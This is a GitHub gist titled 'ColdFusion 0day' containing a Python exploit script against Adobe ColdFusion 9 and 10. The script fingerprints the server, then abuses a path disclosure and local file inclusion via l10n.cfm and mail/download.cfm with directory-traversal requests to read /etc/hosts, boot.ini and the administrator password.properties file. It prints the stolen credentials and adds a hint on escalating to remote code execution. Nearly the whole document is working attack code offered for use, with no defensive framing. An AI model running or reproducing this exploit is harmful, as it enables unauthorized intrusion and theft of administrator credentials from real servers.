Skip to content

Instantly share code, notes, and snippets.

@dnase

dnase/gist:5535523

Last active December 17, 2015 02:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dnase/5535523 to your computer and use it in GitHub Desktop.
Save dnase/5535523 to your computer and use it in GitHub Desktop.
Download ZIP
ColdFusion 0day
Raw
gistfile1.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, time, sys, urllib, hashlib
def flash(color,text,times):
sys.stdout.write(text)
line1 = "\x0d\x1b[2K%s%s" % (color,text)
line2 = "\x0d\x1b[2K%s%s" % (clear,text)
for x in range(0,times):
sys.stdout.write(line1)
sys.stdout.flush()
time.sleep(.2)
sys.stdout.write(line2)
sys.stdout.flush()
time.sleep(.2)
print line2
abspath = ""
operatingsystem = "refrigerator"
coldfusion = 0
def fingerprintcf(protocol,target):
# Fingerprint using md5's of CF 9/10 admin image
print "[*] Fingerprinting CF 9/10 instance"
imgdata = requests.get("%s://%s/CFIDE/administrator/images/loginbackground.jpg" % (protocol,target)).content
md5fingerprint = hashlib.md5(imgdata).hexdigest()
if md5fingerprint == "a4c81b7a6289b2fc9b36848fa0cae83c":
print "[*] Detected ColdFusion 10"
return 10
elif md5fingerprint == "596b3fc4f1a0b818979db1cf94a82220":
print "[*] Detected ColdFusion 9"
return 9
elif md5fingerprint == "779efc149954677095446c167344dbfc":
# ColdFusion 8 doesn't have mail.cfm, but it is still exploitable due to l10n parsing the template as CFM.
# It would require shell data to be on the box to include, such as an uploaded 'picture' or what-not.
print "[*] Requires inclusion: m4ke your 0wn fuq1ng z3r0d4y!"
sys.exit(0)
else:
print "[*] Unable to fingerprint, continuing with little environment data"
return None
def getpath(protocol,target):
# Leverage a path disclosure to get the absolute path on CF9-10
print "[*] Testing for path disclosure"
abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
if "set-cookie" in abspathdata.keys():
try:
abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
print "[*] Absolute path obtained: %s" % abspath
if abspath[0] == "/":
print "[*] Detected Linux"
operatingsystem = "linux"
elif abspath[1] == ":":
print "[*] Detected Windows"
operatingsystem = "windows 95 with bonzibuddy"
else:
print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
operatingsystem = "refrigerator"
except:
print "[?] OS detection failure. Continuing with fingerprint."
else:
print "[?] OS detection failure. Continuing with fingerprint."
return abspath,operatingsystem
# For anyone looking to fully weaponize Subzero into direct RXE for ColdFusion 10, I'll give you a hint. Subzero is a LFI, not a LFD.
# http://en.wikipedia.org/wiki/Local_File_Inclusion
target = raw_input("Target> ")
if "https" in target:
protocol = "https"
target = target.replace("http://","").replace("https://","").split("/")[0]
print "[*] Target set to: %s" % target
print "[*] HTTPS: Enabled"
else:
protocol = "http"
target = target.replace("http://","").replace("https://","").split("/")[0]
print "[*] Target set to: %s" % target
abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)
print "[*] Collecting additional data about operating system"
etchosts = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
bootini = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
if "hosts" in etchosts or "127.0.0.1" in etchosts:
operatingsystem = "linux"
elif "[boot loader]" in bootini or "[operating systems]" in bootini:
operatingsystem = "windows 95 with bonzibuddy"
elif operatingsystem is "linux" or "windows 95 with bonzibuddy":
pass
else:
operatingsystem = "refrigerator"
if operatingsystem is "refrigerator":
print "[*] go0d 1uq!!"
print "[*] Obtaining credentials"
tests = ["../../lib/password.properties","..\..\lib\password.properties"]
if operatingsystem is "windows 95 with bonzibuddy":
if coldfusion == 10:
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
elif coldfusion == 9:
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
else:
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
elif operatingsystem is "linux":
if coldfusion == 10:
tests += ["../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
elif coldfusion == 9:
tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
else:
tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
elif operatingsystem is "refrigerator":
tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
"..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties",
"../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
for path in tests:
lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content
if "encrypted=true" in lfidata:
credzacquired = True
print "[*] CF Administrator credentials acquired:"
print lfidata
else:
pass
if credzacquired == True:
flash(cyan,"[~] SUB ZERO WINS",3)
time.sleep(.5)
flash(red,"[!] FLAWLESS VICTORY",3)
time.sleep(.5)
else:
flash(red,"[!] COLDFUSION ADMIN WINS",3)
time.sleep(.5)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment